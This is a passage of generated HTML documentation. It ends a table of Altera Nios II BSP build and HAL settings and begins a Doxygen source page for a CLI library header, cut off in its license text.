</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Preprocessor macros to undefine. Undefined macros are similar to defined macros, but replicate the "#undef" directive in source code. To undefine the macro FOO use the syntax "-u FOO" in this setting. This is equivalent to "#undef FOO" in a source file. Note: the syntax differs from macro definition (there is a space, i.e. "-u FOO" versus "-DFOO"). Macros defined with this setting are applied to all .S, .c, and C++ files in the BSP. This setting defines the value of BSP_CFLAGS_UNDEFINED_SYMBOLS in the BSP Makefile.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.bsp_cflags_user_flags</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>BSP_CFLAGS_USER_FLAGS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Custom flags passed to the compiler when compiling C, C++, and .S files. This setting defines the value of BSP_CFLAGS_USER_FLAGS in Makefile.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.bsp_cflags_warnings</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>BSP_CFLAGS_WARNINGS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>-Wall</td>
</tr>
<tr>
<td width="20%">Value:</td><td>-Wall</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>C/C++ compiler warning level. "-Wall" is commonly used.This setting defines the value of BSP_CFLAGS_WARNINGS in Makefile.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.bsp_cxx_flags</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>BSP_CXXFLAGS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Custom flags only passed to the C++ compiler. This setting defines the value of BSP_CXXFLAGS in Makefile.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.bsp_inc_dirs</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>BSP_INC_DIRS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Space separated list of extra include directories to scan for header files. Directories are relative to the top-level BSP directory. The -I prefix's added by the makefile so don't add it here. This setting defines the value of BSP_INC_DIRS in Makefile.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.build_post_process</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>BUILD_POST_PROCESS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Command executed after BSP built.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.build_pre_process</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>BUILD_PRE_PROCESS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Command executed before BSP built.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.cc</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>CC</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>nios2-elf-gcc -xc</td>
</tr>
<tr>
<td width="20%">Value:</td><td>nios2-elf-gcc -xc</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>C compiler command.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.cc_post_process</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>CC_POST_PROCESS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Command executed after each .c/.S file is compiled.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.cc_pre_process</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>CC_PRE_PROCESS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Command executed before each .c/.S file is compiled.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.cxx</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>CXX</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>nios2-elf-gcc -xc++</td>
</tr>
<tr>
<td width="20%">Value:</td><td>nios2-elf-gcc -xc++</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>C++ compiler command.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.cxx_post_process</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>CXX_POST_PROCESS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Command executed before each C++ file is compiled.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.cxx_pre_process</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>CXX_PRE_PROCESS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Command executed before each C++ file is compiled.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.ignore_system_derived.big_endian</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enable BSP generation to query if SOPC system is big endian. If true ignores export of 'ALT_CFLAGS += -meb' to public.mk if big endian system.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.ignore_system_derived.debug_core_present</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enable BSP generation to query if SOPC system has a debug core present. If true ignores export of 'CPU_HAS_DEBUG_CORE = 1' to public.mk if a debug core is found in the system. If true ignores export of 'CPU_HAS_DEBUG_CORE = 0' if no debug core is found in the system.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.ignore_system_derived.fpu_present</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enable BSP generation to query if SOPC system has FPU present. If true ignores export of 'ALT_CFLAGS += -mhard-float' to public.mk if FPU is found in the system. If true ignores export of 'ALT_CFLAGS += -mhard-soft' if FPU is not found in the system.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.ignore_system_derived.hardware_divide_present</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enable BSP generation to query if SOPC system has hardware divide present. If true ignores export of 'ALT_CFLAGS += -mno-hw-div' to public.mk if no division is found in system. If true ignores export of 'ALT_CFLAGS += -mhw-div' if division is found in the system.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.ignore_system_derived.hardware_fp_cust_inst_divider_present</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enable BSP generation to query if SOPC system floating point custom instruction with a divider is present. If true ignores export of 'ALT_CFLAGS += -mcustom-fpu-cfg=60-2' and 'ALT_LDFLAGS += -mcustom-fpu-cfg=60-2' to public.mk if the custom instruction is found in the system.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.ignore_system_derived.hardware_fp_cust_inst_no_divider_present</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enable BSP generation to query if SOPC system floating point custom instruction without a divider is present. If true ignores export of 'ALT_CFLAGS += -mcustom-fpu-cfg=60-1' and 'ALT_LDFLAGS += -mcustom-fpu-cfg=60-1' to public.mk if the custom instruction is found in the system.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.ignore_system_derived.hardware_multiplier_present</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enable BSP generation to query if SOPC system has multiplier present. If true ignores export of 'ALT_CFLAGS += -mno-hw-mul' to public.mk if no multiplier is found in the system. If true ignores export of 'ALT_CFLAGS += -mhw-mul' if multiplier is found in the system.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.ignore_system_derived.hardware_mulx_present</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enable BSP generation to query if SOPC system has hardware mulx present. If true ignores export of 'ALT_CFLAGS += -mno-hw-mulx' to public.mk if no mulx is found in the system. If true ignores export of 'ALT_CFLAGS += -mhw-mulx' if mulx is found in the system.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.ignore_system_derived.sopc_simulation_enabled</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enable BSP generation to query if SOPC system has simulation enabled. If true ignores export of 'ELF_PATCH_FLAG += --simulation_enabled' to public.mk.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.ignore_system_derived.sopc_system_base_address</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enable BSP generation to query SOPC system for system ID base address. If true ignores export of 'SOPC_SYSID_FLAG += --sidp=<address>' and 'ELF_PATCH_FLAG += --sidp=<address>' to public.mk.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.ignore_system_derived.sopc_system_id</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enable BSP generation to query SOPC system for system ID. If true ignores export of 'SOPC_SYSID_FLAG += --id=<sysid>' and 'ELF_PATCH_FLAG += --id=<sysid>' to public.mk.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.ignore_system_derived.sopc_system_timestamp</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Value:</td><td>0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enable BSP generation to query SOPC system for system timestamp. If true ignores export of 'SOPC_SYSID_FLAG += --timestamp=<timestamp>' and 'ELF_PATCH_FLAG += --timestamp=<timestamp>' to public.mk.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.make.rm</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>RM</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>rm -f</td>
</tr>
<tr>
<td width="20%">Value:</td><td>rm -f</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>makefile_variable</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Command used to remove files during 'clean' target.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.max_file_descriptors</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALT_MAX_FD</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>32</td>
</tr>
<tr>
<td width="20%">Value:</td><td>32</td>
</tr>
<tr>
<td width="20%">Type:</td><td>DecimalNumber</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>system_h_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Determines the number of file descriptors statically allocated. This setting defines the value of ALT_MAX_FD in system.h.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>If hal.enable_lightweight_device_driver_api is true, there are no file descriptors so this setting is ignored. If hal.enable_lightweight_device_driver_api is false, this setting must be at least 4 because HAL needs a file descriptor for /dev/null, /dev/stdin, /dev/stdout, and /dev/stderr.</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.stderr</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>jtag_uart_cpu_s0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>system_h_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Slave descriptor of STDERR character-mode device. This setting is used by the ALT_STDERR family of defines in system.h.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.stdin</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>jtag_uart_cpu_s0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>system_h_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Slave descriptor of STDIN character-mode device. This setting is used by the ALT_STDIN family of defines in system.h.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.stdout</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>NONE</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>jtag_uart_cpu_s0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>system_h_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Slave descriptor of STDOUT character-mode device. This setting is used by the ALT_STDOUT family of defines in system.h.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.sys_clk_timer</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALT_SYS_CLK</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>timer_cpu_s0</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>system_h_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Slave descriptor of the system clock timer device. This device provides a periodic interrupt ("tick") and is typically required for RTOS use. This setting defines the value of ALT_SYS_CLK in system.h.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.timestamp_timer</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALT_TIMESTAMP_CLK</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>system_h_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Slave descriptor of timestamp timer device. This device is used by Altera HAL timestamp drivers for high-resolution time measurement. This setting defines the value of ALT_TIMESTAMP_CLK in system.h.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<br>
<br>
</body>
</html>
|
zfsd/control/cli/lib/cli-2.7/web/doxygen/html/param__string_8h-source.html | snua12/zlomekfs | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1">
<title>CLI: param_string.h Source File</title>
<link href="doxygen.css" rel="stylesheet" type="text/css">
<link href="tabs.css" rel="stylesheet" type="text/css">
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-20981143-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
</head><body>
<!-- Generated by Doxygen 1.5.1 -->
<div class="tabs">
<ul>
<li><a href="main.html"><span>Main Page</span></a></li>
<li><a href="namespaces.html"><span>Namespaces</span></a></li>
<li><a href="classes.html"><span>Classes</span></a></li>
<li id="current"><a href="files.html"><span>Files</span></a></li>
<li><a href="dirs.html"><span>Directories</span></a></li>
</ul></div>
<div class="tabs">
<ul>
<li><a href="files.html"><span>File List</span></a></li>
<li><a href="globals.html"><span>File Members</span></a></li>
</ul></div>
<div class="nav">
<a class="el" href="dir_7ca5e860cc97c111944d6d090aaeaed5.html">cpp</a> » <a class="el" href="dir_22abaf503d0005dc9eb67dcc8555a85a.html">include</a> » <a class="el" href="dir_5e28deda9cea229e4f9ecc17a144a699.html">cli</a></div>
<h1>param_string.h</h1><a href="param__string_8h.html">Go to the documentation of this file.</a><div class="fragment"><pre class="fragment"><a name="l00001"></a>00001 <span class="comment">/*</span>
<a name="l00002"></a>00002 <span class="comment"> Copyright (c) 2006-2011, Alexis Royer, http://alexis.royer.free.fr/CLI</span>
<a name="l00003"></a>00003 <span class="comment"></span>
<a name="l00004"></a>00004 <span class="comment"> All rights reserved.</span>
<a name="l00005"></a>00005 <span class="comment"></span>
<a name="l00006"></a>00006 <span class="comment"> Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:</span>
<a name="l00007"></a>00007 <span class="comment"></span>
<a name="l00008"></a>00008 <span class="comment"> * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.</span>
<a name="l00009"></a>00009 <span class="comment"> * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.</span>
<a name="l00010"></a>00010 <span class="comment"> * Neither the name of the CLI library project nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.</span>
<a name="l00011"></a>00011 <span class="comment"></span>
<a name="l00012"></a>00012 <span class="comment"> THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS</span>
<a name="l00013"></a>00013 <span class="comment"> "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT</span>
<a name="l00014"></a>00014 <span class="comment"> LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR</span>
<a name="l00015"></a>00015 <span class="comment"> A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR</span>
